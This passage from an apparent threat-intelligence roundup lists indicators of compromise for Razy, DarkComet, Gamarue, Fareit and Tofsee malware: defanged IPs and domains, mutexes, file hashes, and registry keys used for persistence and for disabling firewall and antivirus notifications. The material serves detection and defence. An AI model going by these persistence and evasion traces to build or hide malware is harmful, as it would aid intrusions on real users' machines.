JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]4celia[.]com` | 16 \n`travalogo[.]com` | 9 \n`miracles-of-quran[.]com` | 9 \n`capsaciphone[.]com` | 9 \n`essay[.]essaytutors[.]net` | 9 \n`smtp[.]secureserver[.]net` | 2 \n`pop[.]secureserver[.]net` | 2 \n`mail[.]secureserver[.]net` | 2 \n`secure[.]emailsrvr[.]com` | 2 \n`outlook[.]office365[.]com` | 2 \n`smtp[.]263[.]net` | 2 \n`smtp[.]aruba[.]it` | 2 \n`securepop[.]t-online[.]de` | 2 \n`mail[.]eim[.]ae` | 2 \n`exmail[.]emirates[.]net[.]ae` | 2 \n`mail[.]pec[.]aruba[.]it` | 2 \n`p02-imap[.]mail[.]me[.]com` | 2 \n`mbox[.]cert[.]legalmail[.]it` | 2 \n`smtp[.]pec[.]aruba[.]it` | 2 \n`pop3s[.]pec[.]aruba[.]it` | 2 \n`pop[.]pec[.]istruzione[.]it` | 2 \n`pop3[.]itevelesa[.]com` | 2 \n`smtp[.]mweb[.]co[.]zw` | 2 \n`mail[.]eitelux[.]es` | 2 \n`pop[.]realperfil[.]com[.]br` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\245.exe` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 7 \n`%TEMP%\\CVRA52.tmp` | 1 \n \n#### File Hashes\n\n` 1de08bdcceee9ce5642c85db384163a76e4de953c2e625c944ef1b087c483f4b 24b7af440ef4ac270373b6f5c9514885a3224c046b73cf8ad2f1f43012b2ab79 2b5e8a119ff94422a9b5213562ea161306d91d255b13e8840b8c6e405ca767ca 342e32ccf662f9fdae9df6d332382b5332fd41f47ae970c42197100ccc29bdb2 3c790759a0f56659200ee93697ec8fef684ac4e241545c7e82399cbe5128ce12 47b2096a5d64d83ce0216c4b577d40567e51bdfb7456f2642dbe2222d0fc9ac9 4810b72b5ce022be0b50fb4cc530fa10f8d4351d66c6384eb86ca6a714f697b1 713407b0e97009b83eb112b7c22588ddf4ccc8418fd548ffe8dded8774698894 902d50419ed4b29f175944cd6d1f59d1b06a26b9a659cd04d282c3685cc478d6 adc96e8b0fdb5d977111b124c655a1821d5c9c0810207aaa82ccb5bacc0c6698 b512845fd39f154b9208e59762e4f136838ca52666e4ca598a3e99c90d332061 c5ea35ff71f952e64d69779eb8dfe98d0a8a77f727fae139a66125ad76c3526f cb03c4ba3c52376950f5924ac4491ddb0afff6e5c5d5d2f1512e042c8116ff2a cb33e2134b2670a581eaefc1b800721a0c49e96441027948463c32db39e75fbb ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d deb94515bf4c10daa7c26a3c0fa8ed837ee3ad54176a9d4d3d1b5c6230a2447c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hAH9yd4KNjc/XfPD3VVW5fI/AAAAAAAAC_U/yypPu7ryWkoAfHGAfeBH-nBnytZtZLW3ACLcBGAsYHQ/s1600/ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qZUGQYPaptM/XfPD8y1LctI/AAAAAAAAC_Y/2kK2x-JVk3sRqEtLeanaeh-0QMsYU2_UQCLcBGAsYHQ/s1600/ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-uACqF7F7X_0/XfPElV2C7NI/AAAAAAAAC_k/y5DPae0OFzM1MBgEdE008MgwviXQPXmcgCLcBGAsYHQ/s1600/adc96e8b0fdb5d977111b124c655a1821d5c9c0810207aaa82ccb5bacc0c6698_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-jLT8uQmMiWQ/XfPEpChE_2I/AAAAAAAAC_o/Jwsv4qdfMs4-ynAObHASCw5wKtZWg2L3ACLcBGAsYHQ/s1600/ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d_malware.png>)\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7434602-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`frenchy_shellcode_006` | 10 \n`Startup_shellcode_006` | 10 \n`Global\\{b0cec92d-4b6c-4178-94fb-bf6cc1add43d}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]172[.]83[.]151` | 10 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`dec8973[.]duckdns[.]org` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 10 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\HJdyTuap.exe` | 10 \n`%HOMEPATH%\\ophan.exe` | 10 \n \n#### File Hashes\n\n` 02252b22b7b50a36851f97a612057c61a8aeed4a2d7cc18258fe2ba6d70fe6a5 147eace098585f42a45f6a1cabeb4885f47038f1da2e8dbf700795b7f5176165 472334c6964fa75128a812e1f819693c4a3b19d43466fb01e88d16a04366487b 5928dd708f5190db002c2ac530f61b994ef6667e59894ae7f085296e451cb06d 59ef7cbae939ff16e921afa54d76b2ed960a7c982fd1b41b318e2e840fa67690 8f5d1ed403153ce043daabd92c15452f01142a829ebaa0530a690ca7bf16d8b1 9708566442ccfc689c110efa436095f21a6d2e15ab1a5a5d5bf35d9ce1063768 a9844ac5e8f56a958e42500b31d6e902120d385f373599eeafc9d4316c6ff2e7 c7b1a3495bb7fb1f8f4016952f6ee68873bd6d4c39468602bc97e59eb8cc9177 d9e7d0ae7bacf011c0abfee024872bb7662b06b4f5faa87efc8eccb7ad02a633 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Aj5C206TAoY/XfPE34ifELI/AAAAAAAAC_w/tWwg4GTVGwAlCG0fpEbGO7Y1ZMzEdgJ6wCLcBGAsYHQ/s1600/147eace098585f42a45f6a1cabeb4885f47038f1da2e8dbf700795b7f5176165_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-CHVhE-2NcDs/XfPE908n6FI/AAAAAAAAC_0/ZrZqqDdn9mE1XzbaZy7CqVECbCeaoCRUgCLcBGAsYHQ/s1600/147eace098585f42a45f6a1cabeb4885f47038f1da2e8dbf700795b7f5176165_tg.png>)\n\n \n\n\n* * *\n\n### Win.Packed.DarkComet-7433889-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 6 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:19 PM ` | 4 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:20 PM ` | 4 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:18 PM ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 3 \n`<HKCU>\\HKEY_CURRENT_USER ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Java Updater 12.02.3 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Java Updater ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IE Per-User Initialization utility ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: IE Per-User Initialization utility ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 2 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:24 PM ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-<random, matching [A-Z0-9]{7}>` | 12 \n`DCPERSFWBP` | 4 \n`Paint` | 1 \n`Administrator5` | 1 \n`zRfBoxVQtvcwCKzfoomrPWdIUUjnqiHWPygjEgky` | 1 \n`cbebf6a3c30e189f1791a07b91284eaf` | 1 \n`UNwehCeiwHcpcPqMLnVm` | 1 \n`Global\\c8760b20-185a-11ea-a007-00501e3ae7b5` | 1 \n`wHcpcPqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKq` | 1 \n`yzxDnuCSssIxBsSuZXFtOFvJTDCppRZlOhNkDPDB` | 1 \n`NSaQvFFEJfmtYlkBEHyXmfPxzUwCPMuIhhJReGZF` | 1 \n`IRojNPvPVdSxHIGLipwanmDHJBaphSzCXzESOwLj` | 1 \n`orHcdnwrVlEYrlbHQQOTFxFjvvLPSKixqaILfIMa` | 1 \n`myCQlnwHCfuNhBukQZZY` | 1 \n`Global\\c923cf81-185a-11ea-a007-00501e3ae7b5` | 1 \n`uoHEavVNJUlBWJTqlPRxRXfUzJKINkqxcpoFJLDc` | 1 \n`bQvFGEJgmtYlkBFHyYnfQxzUwCPMuIhhJSeGaFdv` | 1 \n`JwuoGEavUaWilBWXgqlPew` | 1 \n`HusmFCYuTZVgjyUVfojNcvPidSxHIGLvpwan` | 1 \n`xXXyHTvPuSkKkvpIrOxJOL` | 1 \n`vkhbtqNjIOKVZnJLUdYCSkFYSInwwvzlelQcc` | 1 \n`iRfFFfoBdwczSrSdXpZvfpvrEUjqsCZUxzgmGOEj` | 1 \n`Global\\f44dbcc0-185a-11ea-a007-00501e3ae7b5` | 1 \n`QXCcOehkcBeJsodxoboyhhVHiFRfNeQUu` | 1 \n`ewtQmLRNYbqMNXgbFVnIbVLqyzxDoho` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`78[.]159[.]135[.]230` | 4 \n`94[.]73[.]36[.]254` | 2 \n`104[.]16[.]155[.]36` | 1 \n`94[.]73[.]32[.]235` | 1 \n`94[.]73[.]33[.]36` | 1 \n`173[.]194[.]175[.]108/31` | 1 \n`54[.]231[.]48[.]43` | 1 \n`109[.]220[.]205[.]220` | 1 \n`90[.]197[.]55[.]134` | 1 \n`25[.]109[.]69[.]178` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`simond[.]zapto[.]org` | 4 \n`laloutrecam[.]no-ip[.]org` | 2 \n`botofvps[.]no-ip[.]biz` | 2 \n`whatismyipaddress[.]com` | 1 \n`s3-1[.]amazonaws[.]com` | 1 \n`s3[.]amazonaws[.]com` | 1 \n`zcitizen[.]no-ip[.]org` | 1 \n`server-49[.]sytes[.]net` | 1 \n`bbdl[.]ddns[.]net` | 1 \n`who-is[.]ddns[.]net` | 1 \n`update[.]imagineyourcraft[.]fr` | 1 \n`123[.]105[.]12[.]0[.]in-addr[.]arpa` | 1 \n`alaka[.]no-ip[.]biz` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 11 \n`%TEMP%\\AdobeARM.exe` | 10 \n`%TEMP%\\resman.exe` | 7 \n`%TEMP%\\dw.log` | 4 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 4 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 4 \n`%HOMEPATH%\\My Documents\\MSDCSC\\msdcsc.exe` | 3 \n`%HOMEPATH%\\Documents\\MSDCSC` | 3 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 3 \n`%APPDATA%\\pid.txt` | 2 \n`%APPDATA%\\pidloc.txt` | 2 \n`%TEMP%\\garrys mod robot.jpg` | 2 \n`%TEMP%\\holderwb.txt` | 1 \n`\\Paint` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\rmiregistry.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\servertool.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\tnameserv.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\unpack200.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjava.ico` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjavacpl.ico` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjavaw.ico` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjavaws.ico` | 1 \n`%ProgramFiles%\\Microsoft Silverlight\\5.1.30514.0\\coregen.exe` | 1 \n`%ProgramFiles%\\Microsoft Silverlight\\vsllauncher.ico` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Paint.lnk` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 2d6da6399671b08e28a10df9bcf76061f4c98a1f65202fb0dffccd918a5554fc 3a7644b928b85c1e448fe7bb7ddf51056e63f49b9455aae7b2e38fb179559066 6001c594a9e3454fb9359b140dc22e106c5946c323029783e9f122ec285e0c65 79a1576d14b171ce34915fe40b021f73a9d607c2ada2be53e335f330b6cb858f 879c8524b93f3699c02ca366b15677c03df4d5e4e8ba03b43907618adde5627f 908792a782735eb16c229b3b2648c8ea22348a2d378d428d4798fbb21cdca541 918928629a8e0059e82aaa4fe2f226f66a334ead2b8f85dd8eef6e5d288325dc 92729ba8ef8eabfc9b4e88443d94fba225c6a643871fddfc6bf9d8d173d4c7f6 a0f6ffb10dd497d92d870642f2ba86639b170486cbaead79d0a82bd2d7e5edf3 a1999cf773b35ebab2b29acc4d0c0fe92de4bea83e4ee118a2b9a2474b19956c af47feb292bf865a7d0fbf2a8da31f8d04b38c759f5850ef3510a5f2ecaedae1 b1a9a49194c72fe92df017167c753625a80173c81b8a17cb1b20c84093d10c02 bb7b89751f70e99fe62c1edaba821bb95dfab8b0c6d268b845f3f936f09113df bc49d905ffd3203d51e3684755fd2412fdc75ee977350da40db2cae357419bd9 bd9e2ff72624901bf190a22ba2a9419395024d280e7f9d140918ffaecf96065a de59098d7862ae86da6c3159093f1afd4aa72dfc7f6b2826e270e94b272fb7fb df237e6044ad335081f455ce70e0288453ce74c371016def916462e0d93d124e e8f164fe292feef26582e9af9d8e0fec11768a72fcb2202af7180a5a8efa46fa f893532e35d7503e3685c70aaf7a23ce371acc1d0e3779297aba47ae65e9e949 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xsSsv4R3DXY/XfPFQYsOglI/AAAAAAAADAE/O4eD97SOIC0C1DZnSJZVZXpLMt2QCgDSgCLcBGAsYHQ/s1600/908792a782735eb16c229b3b2648c8ea22348a2d378d428d4798fbb21cdca541_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pMYIc9eeOVo/XfPFVE_PuHI/AAAAAAAADAI/gLGOM-3Se2Uf_Pk8U37HLZ-OJIqxhmjLgCLcBGAsYHQ/s1600/908792a782735eb16c229b3b2648c8ea22348a2d378d428d4798fbb21cdca541_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-5MegDd92Olw/XfPFfZ36goI/AAAAAAAADAQ/84qG0AdaeTkVTyCDIXOPRklB8rmGKmxMQCLcBGAsYHQ/s1600/6001c594a9e3454fb9359b140dc22e106c5946c323029783e9f122ec285e0c65_malware.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Gamarue-7440316-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: {77E00C05-FC14-92FB-C64D-2FAE1577C98A} ` | 8 \n`<HKCR>\\CLSID\\{B1D503C8-F3D9-54CE-C64D-2FAE1577C98A} ` | 8 \n`<HKCR>\\CLSID\\{EBF02436-D427-0EEB-C64D-2FAE1577C98A} ` | 8 \n`<HKCR>\\CLSID\\{EBF02436-D427-0EEB-C64D-2FAE1577C98A} ` | 8 \nMutexes | Occurrences \n---|--- \n`Santiv18` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`217[.]23[.]1[.]27` | 8 \n`212[.]8[.]242[.]104` | 8 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`v1[.]eakalra[.]ru` | 8 \n`v1[.]op17[.]ru` | 8 \nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\{DA12294E-A996-195C-0CAA-A4200A7998ED}\\77adf9d1.exe` | 8 \n`%SystemRoot%\\Tasks\\{4602017E-81A6-854C-0CAA-A4200A7998ED}.job` | 8 \n`\\{c78b9d89-a44c-8958-2fb4-20d7a387d6e3}\\a7c25200-afe3-483f-5c47-c10c3cf1e73a.exe` | 8 \n`%ProgramData%\\{EBF02435-D424-0EEB-C64D-2FAE1577C98A}` | 8 \n`E:\\{c78b9d89-a44c-8958-2fb4-20d7a387d6e3}` | 8 \n`E:\\{c78b9d89-a44c-8958-2fb4-20d7a387d6e3}\\a7c25200-afe3-483f-5c47-c10c3cf1e73a.exe` | 8 \n`%ProgramData%\\{EBF02435-D424-0EEB-C64D-2FAE1577C98A}\\464ff4aa.exe` | 8 \n`%System32%\\Tasks\\{77E00C05-FC14-92FB-C64D-2FAE1577C98A}` | 8 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\779425.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\743768.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\888608.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\577671.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\898551.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\569993.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\281727.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\469268.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\502020.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\569087.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\630040.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\825247.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\400602.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\445144.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\223566.exe` | 1 \n`%ProgramData%\\{D73F619F-E147-1471-0CAA-A4200A7998ED}\\688135.exe` | 1 \n \n#### File Hashes\n\n` 0c56ea50a45505f406a4feddcb3b4c055c0d52ca1aa4ca7d8254267fe1e75e52 0f4e733dcf95c9b026b2a081c0bc8883bdcdf8799a31ae2afff8aa12fa980c3f 46e382dadb24dc1dfd6c5ff7faeb088d56a70150ec44015a8370900251b3024e 86251f8acfcf6f5adb20ef8cfb4def27ff42b8248aae488f3a4d3650dda87364 8ffb2571c279e05205e55b169d306f54a574a73c596475f0738593c34dfbb3be 900547463b112df48191a8a950a7375be9c20fb33de917bf5af6d31aa5e5b700 943bdb5be04e4dd27ebf28532a8639eafd6dc7df5e471f733697220a1aee9c93 ab2d58efd6a9c50bfab5b0143009dc25ab0f92d7a9d7bcad39f4edbf1ff6b835 b291fe03d64db56f2dbd01d71364ed39b2a7b83b61161673bea57ab33c27c7e8 bf1a4d2ab6c500f55a8e5d8e9667fc6bfce7cdbd79b2bf9ebbf7a1392ff3956e c865ae6939ddc9a42481a4f2d410a928f11837e807dbd8d6dad867c13b58019e ca47206563a8eb9e402d5f5f957e15bf73d6193985281c38127cc2cdd63bcb64 cf5e15aa7027ca86fc3ad768f1684fd619f367c521231970db5a3024230b34f1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-fMR-A-4Kxkw/XfPFyjMHfdI/AAAAAAAADAg/5RPYRleuqJQPVJGNWvg-cuc-1HAkQjQmACLcBGAsYHQ/s1600/cf5e15aa7027ca86fc3ad768f1684fd619f367c521231970db5a3024230b34f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-igTERemsfO8/XfPF7n6YA4I/AAAAAAAADAk/A2lb_sT_Y7g62f9GslESeOmuqW64Bz38wCLcBGAsYHQ/s1600/cf5e15aa7027ca86fc3ad768f1684fd619f367c521231970db5a3024230b34f1_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Fareit-7431743-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR ` | 10 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsMonitorConfigs32 ` | 10 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 10 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 10 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 10 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 10 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS \nValue Name: WindowsMonitorConfigs ` | 10 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS \nValue Name: WindowsMonitorConfigs32 ` | 10 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\NETWORKLIST\\NLA\\CACHE\\INTRANET \nValue Name: {9EB90D23-C5F9-4104-85A8-47DD7F6C4070} ` | 7 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`37[.]10[.]116[.]208` | 10 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`loqapeek[.]pw` | 10 \n`xistoons[.]pw` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\SystemDriversReserved` | 10 \n`%APPDATA%\\SystemDriversReserved\\rynuqeny.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\filarifi.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\miqonagy.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\xuminazy.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\qeremuvu.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\vywivama.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\cuzuluqa.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\dufenuxu.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\cutypiwu.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\rikicuzo.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\tihupono.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\xomytevu.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\xotadyry.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\zytecufo.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\myciloby.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\kebyqyha.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\fufolely.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\rysopyly.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\zazanyge.exe` | 1 \n`%APPDATA%\\SystemDriversReserved\\niwalefu.exe` | 1 \n \n#### File Hashes\n\n` 10491d1ce14e3c36f1ff822ff1053604043836d94925de6054482c9ae4673359 15901d3d72c05adea149a9b23a03240e84827ee199119beca4bae58d0f2cf292 28495c8cd716b9047bbdecdeb9acb5883a57dcb887db0aa10d72345c25cccf01 2afda0e3c48ea37e936b0ef7d7efbfc5a6e487f1dee0dd89ec83cba2c054ddd0 31f651b56867fe2a75041c5c053977414f33285d1a8294875ef4082269103f59 4629248f320c9fd7d3b2d9b01e3b0e705a07c52ed8c40baa63395ae95b4e6e43 91a2d95ddf43ee9a47c0b2f781d9aa6752ada642cbd826fc8c0ec2c31932870d b831abbd0734bcd7cf2262400d70c32b5909d3a38044327b841b5f05cba93567 d27a710d945ee916fa7ab557e3a360f907d06ca37c34aff86133074ddfed9090 ee3cf9966f84454415d0dda42e29ccf65e14f964daef8233077c2509aa84b305 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ln-xy77AsEw/XfPGRo6Ih3I/AAAAAAAADAw/ndSNsTmToVgpZgQE70MX0ABjDhy3ldHTACLcBGAsYHQ/s1600/ee3cf9966f84454415d0dda42e29ccf65e14f964daef8233077c2509aa84b305_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Rhlfg_Q2PXg/XfPGWbQ_WUI/AAAAAAAADA0/gcVX0mT8o7cxwOPOPkixpL4f7M8pYMB9ACLcBGAsYHQ/s1600/ee3cf9966f84454415d0dda42e29ccf65e14f964daef8233077c2509aa84b305_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7440661-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 2 \n`<HKU>\\.DEFAULT\\CONTROL 